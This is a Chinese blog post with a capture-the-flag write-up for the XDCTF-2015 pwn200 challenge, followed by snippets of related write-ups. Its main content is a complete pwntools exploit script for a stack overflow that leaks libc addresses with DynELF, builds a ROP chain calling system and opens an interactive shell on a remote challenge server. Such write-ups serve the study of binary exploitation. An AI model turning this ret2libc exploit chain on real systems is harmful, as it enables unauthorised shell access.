(攻防世界)(XDCTF-2015)pwn200

最新推荐文章于 2024-07-16 02:03:11 发布
最新推荐文章于 2024-07-16 02:03:11 发布
阅读量2.2k 收藏 2
点赞数 1
文章标签: pwn 栈溢出 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95752798
版权

这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。

既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996
但是这次使用pop_pop_pop_ret将两个合并为一个。

完整exp如下:

#! /usr/bin/env python
from pwn import *
p=remote('111.198.29.45',59936)
elf=ELF('./pwn200')
write_plt=elf.symbols['write']
write_got=elf.got['write']
read_plt=elf.symbols['read']
start_addr=0x080483d0
func_addr=0x08048484
ppp_addr=0x080485cd
def leak(address):
        payload1='a'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(address)+p32(4)
        p.send(payload1)
        data=p.recv(4)
        return data
print p.recvline()
d=DynELF(leak,elf=ELF('./pwn200'))
sys_addr=d.lookup('__libc_system','libc')
payload2='a'*112+p32(start_addr)
p.send(payload2)
print p.recv()
bss_addr=elf.bss()
print "bss_addr="+hex(bss_addr)
payload3='a'*112+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)+p32(sys_addr)+p32(func_addr)+p32(bss_addr)
p.send(payload3)
p.send('/bin/sh')
p.interactive()
PLpa、
关注
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1739
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 440
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
xdctf2015_pwn200
m0sway的博客
11-30 1795
xdctf2015_pwn200.py 使用checksec查看: 只开启了栈溢出。 拉进IDA中查看: main()中直接给出了漏洞函数,跟进查看: 一个简单明了的栈溢出。距离ebp0x6c 用write()函数泄露libc。 exp: from pwn import * #start r = remote("node4.buuoj.cn",27929) # r = process("../buu/xdctf2015_pwn200") elf = ELF("../buu/xdctf2015_p
攻防世界PWN [GFSJ0469] string (不太正经的wp)
最新发布
qq_52161487的博客
07-16 919
拐角的光线很暗,暗得我看不清她的脸和表情,还有烦人的蚊子一直叮我的腿,但从来没有任何一个夏天的感觉能够如此真实。为了回家,勉为其难地,我答应了她。那个她曾和我说过,你们这些人整天对着电脑看书,一个劲儿地用一个女生头像的软件,这一横条一横条的是什么东西,一会goto一会mov的,就像是在走迷宫。前两天在我MP3上听的那首周董的歌你还记得嘛,远方传来风笛,我只在意有你的消息......”好吧,都已经走到现在了,回去未免沦为笑柄,也辜负了巫师小姐姐对我们的期望,我们要做的只能是硬着头皮走下去,来吧,
[BUUCTF]PWN——xdctf2015_pwn200
mcmuyanga的博客
11-11 1141
xdctf2015_pwn200 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数 vuln函数 参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法 利用过程: 先用write函数泄露libc版本 payload='a'*(0x6c+4) #溢出到ret payload+=p32(wri
XDCTF2015 PWN200
Bill
03-01 1744
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1609
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1624
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显栈溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
攻防世界pwn200
qq_25044201的博客
01-17 261
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
xdctf-pwn200
Vccxx的博客
04-08 1359
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 444
做题记录
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 624
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 272
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值